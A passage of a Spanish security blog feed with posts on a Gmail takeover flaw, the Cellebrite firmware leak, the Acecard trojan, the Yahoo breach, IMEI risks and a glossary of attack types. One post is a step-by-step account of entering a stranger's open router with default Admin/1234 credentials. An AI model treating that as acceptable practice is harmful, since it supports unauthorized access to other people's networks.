Si se cumple una de ellas, el atacante confirma la propiedad del correo enviando un email a Google, mientras que el buscador enviará una respuesta a dicha dirección para su confirmación. La nueva dirección será incapaz de recibir el correo de confirmación con lo que se devuelve el mensaje al original con un código que podría ser usado por el atacante para acabar el proceso con el robo de cuenta de Gmail.<br><br>
Fuente: <a href="http://www.techworm.net/2016/11/hacker-discovered-vulnerability-gmail-allows-anyone-hack-email-account.html">Techworm</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5177014300366239033.post-1021784260906009072016-10-27T08:18:00.001-07:002016-10-27T08:18:50.426-07:00Firmware de Cellebrite para hackear móvilesHay muchos motivos por los que intentar acceder a un móvil bloqueado. La Policía y otros cuerpos y fuerzas de seguridad tienen muchos, y esta necesidad ha creado un mercado para numerosas compañías que ofrecen la tecnología necesaria para ello. Una de las más destacadas es Cellebrite, especializada en firmware y hardware para hackear teléfonos móviles.<br><br>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0n9wDbsmh7Oz_hKDsUgADEYHP72MO0sIMXjL83vtHcuYKX7aaEzAprdYr3lKmtVg6uYe1Yusygu38Ggjm6klIK6VKYWo7WlSD44pc9Gw6jhWe_mp8x4pO7x0C3Y0OrU_9QiGpKKFKam7a/s1600/touch_ued-carluys.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0n9wDbsmh7Oz_hKDsUgADEYHP72MO0sIMXjL83vtHcuYKX7aaEzAprdYr3lKmtVg6uYe1Yusygu38Ggjm6klIK6VKYWo7WlSD44pc9Gw6jhWe_mp8x4pO7x0C3Y0OrU_9QiGpKKFKam7a/s400/touch_ued-carluys.jpg" width="400" height="226" /></a></div><br>
Cellebrite distribuye su tecnología para extraer datos de dispositivos móviles siguiendo un modelo de pago. Actualmente, las agencias de seguridad son sus principales clientes, un negocio que mantiene con relativo secretismo, sin facilitar a la ligera el firmware que se esconde detrás de sus productos.
<blockquote>Sin embargo, ahora éste ha sido filtrado por uno de sus distribuidores, <a href="http://www.mcsira.com/web/8888/nsf/sbs.py?&_ID=8652&G=8652&did=3128&PF=1&lang=EN">McSira Professional Solutions</a>. Con el firmware a mano, la competencia o los hackers intentarán fabricar sus propios programas para hackear teléfonos móviles a partir del de Cellebrite. En el código podrían encontrarse varias de las vulnerabilidades que Cellebrite explota para desbloquear móviles sin permiso de sus dueños.<br><br>
Entre los productos filtrados por McSira están el firmware de UFED Touch y UFEC 4PC, dos herramientas que sirven para acceder a móviles bloqueados y extraer datos de ellos. Hasta ahora, Cellebrite se ha mostrado eficiente a la hora de hackear móviles Blackberry, Android y algunos modelos de Apple, aunque el iPhone 6 y el 7 aún están a salvo.</blockquote>
Tras el atentado de San Bernardino, el FBI mantuvo una lucha con Apple para que la compañía facilitara el acceso al iPhone 5C del asesino. Aunque no lo hizo, el FBI logró acceder al mismo igualmente. Este hardware sólo se vende a agencias gubernamentales, con el objetivo de desbloquear móviles destruidos o cuyos propietarios no pueden colaborar.<br><br>
Según han declarado un hacker a Motherboard, aún está examinando los archivos filtrados para ver qué se puede hacer con ellos. De momento ha conseguido hackear un iPad de prueba, aunque de forma muy limitada. Cellebrite alega que lo publicado en la web de McSira no es suficiente para crackear su software y poder crear un programa que permite acceder ilegalmente a otros teléfonos móviles, robados o no.<br><br>
Vía <a href="https://motherboard.vice.com/read/the-phone-hackers-at-cellebrite-have-had-their-firmware-leaked-online">Motherboard</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5177014300366239033.post-4071766799588077112016-10-15T12:24:00.000-07:002016-10-15T12:24:08.027-07:00Troyano que te pide un selfie para robarte el dineroCada vez hay más compañías que optan por la seguridad de pedir un selfie para realizar una actividad bancaría, algo de lo que tienen conocimiento los hackers que ya piensan usar dicho paso de seguridad para robar más fácilmente la cuenta de los usuarios. Este proceso del selfie se suele hacer para que la entidad bancaria tenga constancia de que, realmente, es esa persona, el titular de la cuenta o tarjeta, la que está realizando el pago.<br><br>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidcMq2XQi6Ygy-AiCg7d0iERKsYACcSos6cBgrQs-p-SkmqDeg9OSDDMoU1mtEKB22F6fl4lzSQYytpbXNdFEwoiCFPgpaRF5QwJjbUbuDQGGJhlYW_6IVgm7i2x_aSAxtM1zSrlZriopA/s1600/anonymous-selfie-carluys.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidcMq2XQi6Ygy-AiCg7d0iERKsYACcSos6cBgrQs-p-SkmqDeg9OSDDMoU1mtEKB22F6fl4lzSQYytpbXNdFEwoiCFPgpaRF5QwJjbUbuDQGGJhlYW_6IVgm7i2x_aSAxtM1zSrlZriopA/s400/anonymous-selfie-carluys.jpg" width="400" height="226" /></a></div><br>
Sin embargo un hacker puede mandar un selfie que haya sido robado para hacerse pasar por ti al utilizar tu propia tarjeta, y esta es la misión de una nueva versión del troyano <a href="https://securelist.com/blog/research/73777/the-evolution-of-acecard/">Acecard</a>. Acecard es un troyano bancario que se enmascara dentro de una pasarela de pago para hacerse con todos tus datos bancarios.
<blockquote>Este troyano primero infecta tu teléfono cuando te instalas un plugin de vídeo o cualquier aplicación que esté ya infectada. Una vez que lo tienes en el propio teléfono móvil no actúa hasta que realizas un pago en cualquiera de las pasarelas de pago que tengas en el teléfono móvil.</blockquote>
Al momento de realizar el pago, este troyano se sobreimpresionará en tu pantalla haciéndote creer de que se trata de la pasarela de pago, pidiéndote todos tus datos bancarios como nombre completo, número de tarjeta, fecha de expiración, número de seguridad trasera y hasta un selfie tuyo sosteniendo tu DNI en la mano, que utilizarían en el supuesto de que la entidad bancaria lo pida al realizar una operación.<br><br>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcMykI6YYcsupD7QqPBH5VzPHpd7SNUWKHDLyMElSk3hVyq_HXMHo0f03pN5t_bLH0cZEi8-6JggyP3rLFo53iP1PKtGYYFejyhjrdx94oRx7BIX9W2h8qvlKZE4F2BU_kLfEiu_pCbEWf/s1600/recorte620_acecard-carluysblog.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcMykI6YYcsupD7QqPBH5VzPHpd7SNUWKHDLyMElSk3hVyq_HXMHo0f03pN5t_bLH0cZEi8-6JggyP3rLFo53iP1PKtGYYFejyhjrdx94oRx7BIX9W2h8qvlKZE4F2BU_kLfEiu_pCbEWf/s400/recorte620_acecard-carluysblog.jpg" width="400" height="226" /></a></div><br>
Con todos estos datos y la fotografía, los hackers, prácticamente, podrán sacar cualquier dinero de la tarjeta bancaria sin muchos problemas, e incluso podrían robarte tu identidad haciéndose pasar por ti en operaciones ajenas.<br><br>
Via <a href="http://thehackernews.com/2016/10/android-banking-trojan.html">TheHackerNews</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5177014300366239033.post-52315241534988662132016-09-23T07:57:00.000-07:002016-09-24T10:24:05.299-07:00500 millones de usuarios hackeados en Yahoo!Verizon <a href="https://twitter.com/DaveLeeBBC/status/779046300021059584">dijo</a> a la BBC que sabe de la vulneración desde hace apenas dos días y que este hackeo le ha hecho "evaluar sus intereses" respecto a la empresa comprada. Mientras la venta al operador estadounidense Verizon sigue sin completar, Yahoo! ha confirmado una brecha que afecta a cientos de millones de usuarios registrados en sus servicios.<br><br>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEij9ZYY-fvWuLFygtG-qGcqND1ZBGkzlvJQuaUEyf1Pw8wOhwM2x11dwGwMUQwmNLobZYVu1VZnp24vluRcS9jD2yswkFF4w-XbUEhoYXXLuXcHCs0XC3E791YySNjEXjpdJairq7IfIkHj/s1600/yahoo-data-breach.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEij9ZYY-fvWuLFygtG-qGcqND1ZBGkzlvJQuaUEyf1Pw8wOhwM2x11dwGwMUQwmNLobZYVu1VZnp24vluRcS9jD2yswkFF4w-XbUEhoYXXLuXcHCs0XC3E791YySNjEXjpdJairq7IfIkHj/s400/yahoo-data-breach.png" alt="Homero Simpsons ilustration 500 millones de usuarios hackeados en Yahoo!" width="400" height="209" /></a><br>
<tr><td class="tr-caption" style="text-align: center;"><i>Imagen de homero yahoo! por <a href="http://thehackernews.com/2016/09/yahoo-data-breach.html">The Hacker News</a></i></td></tr></div><br>
Los datos personales de todos estos usuarios habrían sido hackeados en agosto. La confirmación oficial sitúa esta violación de privacidad de la compañía de Sunnyvale como <a href="https://haveibeenpwned.com/">la más</a> importante de la historia "que se sepa" por número de usuarios afectados.<br>
<blockquote>
<ul>
<li><b>Yahoo</b>: 500 millones de cuentas.</li>
<li><b>MySpace</b>: 359 millones de cuentas.</li>
<li><b>Linkedin</b>: 165 millones de cuentas.</li>
<li><b>Adobe</b>: 152 millones de cuentas.</li>
<li><b>Badoo</b>: 112 millones de cuentas.</li>
<li><b>VKontakte</b>: 93 millones de cuentas.</li>
<li><b>Dropbox</b>: 69 millones de cuentas.</li>
<li><b>Tumblr</b>: 65 millones de cuentas.</li>
</ul>
</blockquote>
<h3>Cómo evitar que te ocurra</h3><br>
Nuestros datos personales son mercancía barata en el mercado negro. En este caso han sido vendidos a cualquiera que quisiera comprarlos por 3 Bitcoin, poco más de 1.500 euros o 1.800 dólares al cambio. Recuerda aprender a protegerte para evitar que te pase.<br><br>
No debemos repetir el mismo email y clave en varios sitios, hay que usar gestores de contraseñas y verificación de dos pasos siempre que estén disponibles. De esta forma, cuando nuestros datos aparezcan filtrados de forma masiva como en este caso, el resto de nuestras cuentas seguirán sin estar afectadas.Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5177014300366239033.post-7210454862158932202014-06-04T00:07:00.000-07:002016-09-17T12:31:11.668-07:00El peligro de hacer publico el IMEI de tu dispositivo movilBueno en vista de ver y de tanto ver como muchas personas publican su <b>código IMEI</b> en distintos foros y sitios webs de preguntas y respuestas tanto como en sitios que se dedican a realizar estafas gracias a la ingenuidad de muchos, explicaré un poco del gran riesgo que existe en esto.<br><br>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFN_DNSv_8CkRQSZCxY6Cku_1BiBFYJXresnJ6fvxECQNv1q49sOwi6SE_Eh6MiLH1kXdUcSfxKvGykOPEW6NqRYn1sKmQ7jAZ3sxgRK3t64QxvbNSTWUX8D4x4sVZ4BoJ5-fqK9OzZ2Q1/s1600/belle-hacked.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFN_DNSv_8CkRQSZCxY6Cku_1BiBFYJXresnJ6fvxECQNv1q49sOwi6SE_Eh6MiLH1kXdUcSfxKvGykOPEW6NqRYn1sKmQ7jAZ3sxgRK3t64QxvbNSTWUX8D4x4sVZ4BoJ5-fqK9OzZ2Q1/s400/belle-hacked.jpg" /></a></div><br>
A continuación voy a mostrarles un ejemplo de como personas publican libremente su código IMEI cometiendo un terrible error del cual no estan al tanto:<br><br>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoAWSLmnXDQxcpy_ZAlmGVbB9i-BdqkITORuwO7I0HkYMH8Wx94ShrFT-AQmtTyHHpCXQCG-wQfMuDzJmSGhjv6jK1MHz6Lbo0dh9Gr68Lh0lFcSpqIGnsQYlJ-Ljt4nh4b4BMUtcc-Djm/s1600/peligrodehcerpublicounimei-carluys.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoAWSLmnXDQxcpy_ZAlmGVbB9i-BdqkITORuwO7I0HkYMH8Wx94ShrFT-AQmtTyHHpCXQCG-wQfMuDzJmSGhjv6jK1MHz6Lbo0dh9Gr68Lh0lFcSpqIGnsQYlJ-Ljt4nh4b4BMUtcc-Djm/s400/peligrodehcerpublicounimei-carluys.jpg" /></a></div><br>
Existen distintas formas de mandar tu dispositivo movil al carajo si se quiere a continuación te mostraré lo que alguien puede hacer con tu IMEI:<br><br>
<h3>1. Clonar tu telefono movil</h3><br>
Un teléfono celular clonado es <b><i>un aparato que fue reprogramado para transmitir el código del aparato y el código de un abonado habilitado</i></b>. Así, el defraudador usa el aparato clonado para hacer las llamadas telefónicas y las mismas son debitadas en la cuenta del titular de la línea. <br><br>
<b>¿Cómo se realiza la clonación?</b><br>
Generalmente el fraude de clonación pasa cuando el usuario se encuentra <b>fuera del área de movilidad de origen</b>, o sea, en "<b><i>roaming</i></b>", y operando en modo analógico.<br><br>
Personas inescrupulosas obtienen el <b>código del aparato/código del usuario</b>(<i>IMEI</i>) por medio de monitorización ilegal de teléfono celular habilitado. Supuestamente, cada teléfono celular posee un único código. Pero, después de la clonación, <b>existirán dos teléfonos celulares con el mismo código del aparato/código del subscriptor</b>. En esta condición, la central de la prestadora de servicio celular no consigue distinguir el aparato clonado de uno debidamente habilitado.<br><br>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRGqN62mXi0pKlDH9Ti4JN1BlbIs4biOgqUMDVtEohc09N8xZ_hSeyohvcMsXBcrBbkuszFNp3g4UXgi2FkcH5NxGcGmFGGXScW2i_jHigjvGoq5PFHvPzoKqpeU6X3AiSv9g8nQZdZ81I/s1600/Celulares-clonados-carluys.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRGqN62mXi0pKlDH9Ti4JN1BlbIs4biOgqUMDVtEohc09N8xZ_hSeyohvcMsXBcrBbkuszFNp3g4UXgi2FkcH5NxGcGmFGGXScW2i_jHigjvGoq5PFHvPzoKqpeU6X3AiSv9g8nQZdZ81I/s400/Celulares-clonados-carluys.jpg" /></a></div><br>
<b>Indicios</b><br>
<ul>
<li>Dificultades para completar llamadas generadas</li>
<li>Caídas frecuentes de conexión</li>
<li>Dificultades para llamar su buzón de mensajes</li>
<li>Llamadas recibidas de números desconocidos, nacional e internacional</li>
<li>Importes por prestación de servicios muy superiores a la media</li>
</ul>
Según eh oido que es posible enviar archivos maliciosos por medio del bluetooth al dispositivo primario desde el secundario, desconozco este método en realidad<br><br>
<h3>2. Denunciar tu Telefono movil y bloquearlo</h3><br>
Con tu código IMEI realizan una denuncia con el mismo y el modelo en comisaria y lo bloquean, No obstante simplemente pueden acceder a <a href="http://www.movistar.com.ar/robo-de-equipos/">Movistar(Robo de equipos)</a>, realizar un reporte y facilmente tu telefono puede quedar inhabilitado por hacer hacer tu IMEI publico.<br><br>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglc70KTWCnGJHQyD5WPX3jVspg_zH-3xtqbWFYAxcnjRERWmg1DACjVreIIi4EGeMI5kn9aBrcv10OoQo-0MMbOPMnoHCqrZkJ1RCh5RBdqZeOfTkfD9v7Mg-aa2hTfzDngG4er1aP3XBZ/s1600/telefono-bloqueado-carluys.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglc70KTWCnGJHQyD5WPX3jVspg_zH-3xtqbWFYAxcnjRERWmg1DACjVreIIi4EGeMI5kn9aBrcv10OoQo-0MMbOPMnoHCqrZkJ1RCh5RBdqZeOfTkfD9v7Mg-aa2hTfzDngG4er1aP3XBZ/s400/telefono-bloqueado-carluys.png" /></a></div><br>
<div class="note">Mis recomendaciones son simples... NO PUBLIQUES TU CÓDIGO IMEI ESO ES COMO TU DOCUMENTO DE IDENTIDAD. Gracias.</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5177014300366239033.post-62492753179856096892014-03-24T12:53:00.000-07:002014-03-24T12:53:45.604-07:00Accediendo a la configuración de un Router Wifi desde AndroidRecuperando el tiempo perdido y ausentado en el blog por cosas y motivos personales no esperados y un poco de vacaciones de carnaval acá estoy de vuelta y dejandoles una pequeña y simple experiencia con la que me tope, se trata de tomar <b>control de un router wifi default</b> (<i>Libre de contraseña y seguridad</i>) desde mi dispositivo android.<br />
<br />
Todos sabemos ya que las redes WiFi abiertas son inseguras en su propia naturaleza, debido a que cualquiera que esté en ese alcance sera vulnerable, y sin necesidad tan siquiera de conectarse al punto de acceso podrá capturar y visualizar el tráfico que está circulando entre los dispositivos y el punto de acceso.<br />
<br />
Pues resulta que el unico conectado a la red wifi que me encontre era solamente yo como no tuve más nada que hacer quise acceder a la configuración del router por medio de la dirección ip burlando la autenticación que era la por defecto (<b>User</b>: <i>Admin</i> - <b>Password</b>: <i>1234</i>), se preguntarán como lo hice y de que manera pude dar con la dirección ip, pues asi.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxc0Y3q6jY6Mwbbf-QXNkoXGk1z_JsmDWGwMtok3qdvyenyQErWoGAt6D_GR4MokNqOsE1f4EjhdTABvnXbmzQsWtw9TTfL19uQ7MsDQG0kEMPfLZAF7aMJBAOI_H8yYZo-1qcr8kWh30h/s1600/1962716_10200717892429725_1899333482_n.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxc0Y3q6jY6Mwbbf-QXNkoXGk1z_JsmDWGwMtok3qdvyenyQErWoGAt6D_GR4MokNqOsE1f4EjhdTABvnXbmzQsWtw9TTfL19uQ7MsDQG0kEMPfLZAF7aMJBAOI_H8yYZo-1qcr8kWh30h/s400/1962716_10200717892429725_1899333482_n.jpg" height="640" width="360" /></a><br><tr><td class="tr-caption" style="text-align: center;"><i>Primera captura del wifi encontrado</i></td></tr></div><br />
Con la herramienta <a href="https://play.google.com/store/apps/details?id=com.overlook.android.fing">Fing</a>, que es un escáner de red para <b>Android</b>, uno de los mejores de la <b>PlayStore</b> y cabe acotar que <a href="https://itunes.apple.com/es/app/fing-network-scanner/id430921107?mt=8">también esta disponible para Iphone</a>.<br /><br />
Bueno accedí a la red mostrada y señalada en la imagen y se genero lo siguiente:<br /><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1TBYjMG0p3azIzeS4S2JFxlPmE5BwLJvdFnQnK8nTBBTfdnw3_N6dwsX11VzMFoLf_7VKYZNyHLsXk53EqGP3-Q9SSOPeCFiIhAWYwNuwW82w9rF0xJLt0ceqESd4lfmjRxcez1GUr_-u/s1600/10013948_10200717906470076_1626276546_n.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1TBYjMG0p3azIzeS4S2JFxlPmE5BwLJvdFnQnK8nTBBTfdnw3_N6dwsX11VzMFoLf_7VKYZNyHLsXk53EqGP3-Q9SSOPeCFiIhAWYwNuwW82w9rF0xJLt0ceqESd4lfmjRxcez1GUr_-u/s640/10013948_10200717906470076_1626276546_n.jpg" /></a><br><tr><td class="tr-caption" style="text-align: center;"><i>Segunda captura mostrando un poco más de información</i></td></tr></div><br />
Entre las 5 opciones que se muestran en la segunda captura de pantalla elegí "<b>Scan services</b>" como señale allí, pues ahora dentro del mismo me encontré con 2 opciones más (<b>domain</b> y <b>http</b>), como no fue importante para mi la primera elegí la segunda que detonó mi curiosidad aca muestro gráficamente con una tercera captura:<br><br>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgp5nXyiNgznJS90MWaD5epJzkN_0_p15lPv4iUFTG3B_H2Gwaz2vpJgwozkm9O7psNV0PilkiUxEsxK_rwwVcxhovJThvax7K-AEXwZnDUsBKLMQdWarV0HOL0KUvt-d1c0tFDfDqTGUXc/s1600/10150745_10200717906750083_795029233_n.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgp5nXyiNgznJS90MWaD5epJzkN_0_p15lPv4iUFTG3B_H2Gwaz2vpJgwozkm9O7psNV0PilkiUxEsxK_rwwVcxhovJThvax7K-AEXwZnDUsBKLMQdWarV0HOL0KUvt-d1c0tFDfDqTGUXc/s640/10150745_10200717906750083_795029233_n.jpg" /></a><br><tr><td class="tr-caption" style="text-align: center;"><i>Tercera captura mostrando la opción para entrar a la configuración "<b>http</b>"</i></td></tr></div><br>
World wide web HTTP y al presionar allí se generó una ventana con 3 opciones la cual elegí <b>Open browser</b> como muestro aca:<br><br>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyKVsvRQVPPZqbQk3h3CU_5Y8L056ENwlaPSym9qIBY868Rdt_pf0MBOtHaONHTmy_1cFn1-2U0S_187tSD8q5nrt5zz2d3Cw1eMJ5qSb7SLzAvQKsss-8MoaGlFPMGvfj64i9NA88R-Bh/s1600/1016818_10200717906910087_438680209_n.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyKVsvRQVPPZqbQk3h3CU_5Y8L056ENwlaPSym9qIBY868Rdt_pf0MBOtHaONHTmy_1cFn1-2U0S_187tSD8q5nrt5zz2d3Cw1eMJ5qSb7SLzAvQKsss-8MoaGlFPMGvfj64i9NA88R-Bh/s640/1016818_10200717906910087_438680209_n.jpg" /></a><br><tr><td class="tr-caption" style="text-align: center;"><i>Cuarta captura mostrando la opción para abrir el navegador y autenticarnos</i></td></tr></div><br>
En efecto se abrió el navegador y se mostró la dirección ip y rapidamente salio la ventana de autenticación en la que simplemente añadí (<b>User</b>: <i>Admin</i> - <b>Password</b>: <i>1234</i>) y listo accedí a la configuración del router vía web.<br><br>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs5HzmswM70YGco6OeNNYmpOdisLj5yFXvgyBBBn0ckAnkeV1O0Dn_OdpSlnURlvEdaJqq_xzBwsrN_auyzOQzHUm6WmULCuCjO59pEcF1I5btcy3zETEvGDdM51jo4wYadQ0VW2iQVTFR/s1600/1508132_10200717907110092_1962070703_n.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs5HzmswM70YGco6OeNNYmpOdisLj5yFXvgyBBBn0ckAnkeV1O0Dn_OdpSlnURlvEdaJqq_xzBwsrN_auyzOQzHUm6WmULCuCjO59pEcF1I5btcy3zETEvGDdM51jo4wYadQ0VW2iQVTFR/s640/1508132_10200717907110092_1962070703_n.jpg" /></a></div><br>
Algo realmente sencillo y sin complicaciones ahora puedo cambiar los datos de login y colocar contraseña a la red inalámbrica entre otras opciones...
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5177014300366239033.post-48063669002028211652012-10-20T19:12:00.000-07:002014-05-17T15:49:23.900-07:00Formas de atacar un sistemaHay muchas formas de atacar un sistema, pero ¿en qué se diferencian unas de otras?, Aquí les dejo una recopilación de los tipos de ataques que se pueden hacer sobre un sistema.<br><br>
Podemos definir una intrusión como un conjunto de acciones que intentan comprometer la integridad, confidencialidad o disponibilidad de un recurso.<br><br>
Aunque una máquina tenga varios controles de seguridad implementados, el software que ésta tiene instalado puede tener problemas de seguridad y conducir a una posible intrusión.<br><br>
<h3>Tipos de intrusiones:</h3><br>
<b>Connection Flood</b><br>
Los servicios TCP orientados a conexión (telnet, ftp, http, smtp…) tienen un límite máximo de conexiones simultáneas, si este límite se alcanza, cualquier conexión nueva es rechazada.<br><br>
<b>DoS : Denial of Service</b><br>
Un ataque de denegación de servicio se centra en sobrepasar los límites de recursos establecidos para un servicio determinado, obteniendo como resultado la eliminación temporal del servicio.<br><br>
<b>Finger Bomb</b><br>
Se trata de un tipo de ataque DoS que permite forzar al sistema destino a un consumo elevado de CPU, realizando una petición finger recursiva.<br><br>
<b>DDoS</b><br>
Es una variante más potente que denegación de servicios, son los ataques de denegación de servicio distribuidos, que se basan en realizar ataques DoS de forma masiva a un mismo objetivo desde diferentes localizaciones en la red, de forma que la potencia de ataque sea mucho mayor.<br><br>
<b>Fingerprinting</b><br>
Se trata de una técnica más específica que permite extraer información de un sistema en concreto. El objetivo principal suele ser extraer el sistema operativo que se ejecuta en la máquina destino.<br><br>
Una de las herramientas que proporciona esta información es nmap.<br><br>
<b>Footprinting</b><br>
También llamado huella identificativa. Se trata de recoger todo tipo de información del objetivo a atacar, este tipo de información se puede extraer a nivel de una red. Existen numerosas utilidades para recoger información de un sistema: ping, whois, finger, rusers, nslookup, rcpinfo, telnet, dig, nmap… Eavesdropping
Es una variante de sniffing con la diferencia que contempla el tráfico que circula por la red, pero sin modificar el contenido del sistema.<br><br>
<b>Escaneo de puertos</b><br>
El escaneo de puertos determina los servicios de cada máquina, se descubren puntos de entrada a los mimos que abren nuevas vulnerabilidades.<br><br>
Una completa herramienta para escaneo de puertos es la ya nombrada nmap.<br><br>
Entre otras herramientas de características similares encontramos:<br><br>
NESSUS: <a href="http://www.nessus.org/">http://www.nessus.org</a> (UNIX Y WIN)<br>
SATAN: <a href="http://www.fish.com/satan">http://www.fish.com/satan</a> (UNIX)<br>
SARA: <a href="http://www-arc.com/sara">http://www-arc.com/sara</a><br>
TITAN: <a href="http://www.fish/titan">http://www.fish/titan</a> (solaris)<br><br>
Este tipo de herramientas permite comprobar si un sistema es vulnerable a un conjunto de problemas de seguridad, avisándonos sobre ellas y su posible solución.<br><br>
<b>IP spoofing</b><br>
Se basa en actuar en nombre de otro usuario tal y como si se fuese él mismo. Se basa en la generación de paquetes IP con una dirección origen falsa. El motivo es porque existe un dispositivo de filtrado de trafico con esa dirección IP origen.<br><br>
<b>Land</b><br>
Este ataque permite bloquear un sistema, mediante el envío de un paquete SYN cuya dirección IP fuente y destino es la misma.<br><br>
<b>Masquerading</b><br>
Este ataque consiste en suplantar la identidad de cierto usuario autorizado de un sistema informático o su entorno, esta suplantación puede realizarse electrónicamente o en persona.<br><br>
<b>Net Flood</b><br>
El objetivo de este ataque es disminuir la capacidad de conexión a la red de un sistema, saturando sus enlaces de comunicaciones. Por ejemplo, si un enlace de una organización tiene un ancho de banda de 30Mb y un atacante de 100Mb, prácticamente la totalidad del trafico cursado por la organización pertenecerá al atacante, por lo que no podrá enviarse tráfico útil.<br><br>
<b>Sesion hijaking</b><br>
Esta técnica consiste en apoderarse de una sesión ya establecida. Esto podría suponer el obviar todo el proceso de autenticación previo, el atacante debe situarse entre el equipo que estableció la conexión original y la víctima.<br><br>
<b>Shoulder surfing</b><br>
Consiste en espiar físicamente a los usuarios para obtener generalmente las claves de acceso. Descuidos tan notables como dejar las contraseñas debajo del teclado o anotadas en cualquier papel.<br><br>
<b>Source routing</b><br>
Esta funcionalidad propia del protocolo IP permite enviar dentro del mismo paquete de datos la información necesaria para su enrutamiento, es decir, la dirección IP de cada uno de los dispositivos de red intermedios q deben cruzarse hasta llegar al destino final.<br><br>
Desde el punto de vista de la seguridad supone que un atacante es capaz de manejar por donde deben viajar sus paquetes OP, saltándose todas las reglas de enrutamiento definidas en los dispositivos de red. También, permite la realización de pruebas para conocer la topología de la red. Está unida a la técnica IP spoofing.<br><br>
<b>Phising</b><br>
Delito que se comete por intentar adquirir información confidencial de forma fraudulenta, como puede ser contraseñas o información sobre las tarjetas de crédito. En este caso el phiser se hace pasar como una persona de confianza mediante correo electrónico normalmente.<br><br>
<b>Ping of death</b><br>
Conocido como el ping de la muerte, este ataque se basa en enviar un paquete de ping (ICMP echo request) de un tamaño muy grande. El resultado obtenido en muchas ocasiones es que el sistema destino deja de proveer servicio al bloquearse ya sea reiniciándose o apagándose.<br><br>
<b>Routing protocols</b><br>
Los protocolos de enrutamiento pueden ser vulnerados principalmente mediante la introducción de paquetes de actualización de rutas, de forma que es posible condicionar los caminos que seguirá el tráfico según un criterio establecido.<br><br>
Uno de los protocolos que puede ser falseado (spoofing) es RIP.<br><br>
<b>SMTP Flood</b><br>
Consiste en el envío masivo de mensajes de correo electrónico a grandes listas de usuarios de forma continua, con lo provocaría una saturación de los servidores de correo destino e intermedios.<br><br>
<b>SMTP Spoofing y Spamming</b><br>
En el nivel de aplicación, protocolo SMTP (puerto 25) es posible falsear la dirección fuente de un correo o email, enviando por tanto mensajes en nombre de otra persona. El protocolo no lleva a cabo ningún mecanismo de autenticación cuando se realiza la conexión TCP al puerto asociado.<br><br>
<b>Smurf</b><br>
Esta técnica esta dentro del concepto de Net Flood con la característica que se aprovecha de de broadcast de las redes.<br><br>
Si la dirección de broadcast se encuentra accesible desde una red exterior, es posible que un atacante pueda enviar un paquete de datos a la misma, provocando que todos los sistemas pertenecientes a dicha red respondas simultáneamente.<br><br>
<b>Sniffing</b><br>
Permite la obtención de una gran cantidad de información enviada sin encriptar, como por ejemplo usuarios, direcciones emails, claves, números de tarjetas de crédito…<br><br>
Los sniffers operan activando una de las interfaces de red del sistema en modo promiscuo. De este modo, el sniffer almacenará en un log todo el tráfico que circule por la tarjeta de red.<br><br>
<b>Snooping</b><br>
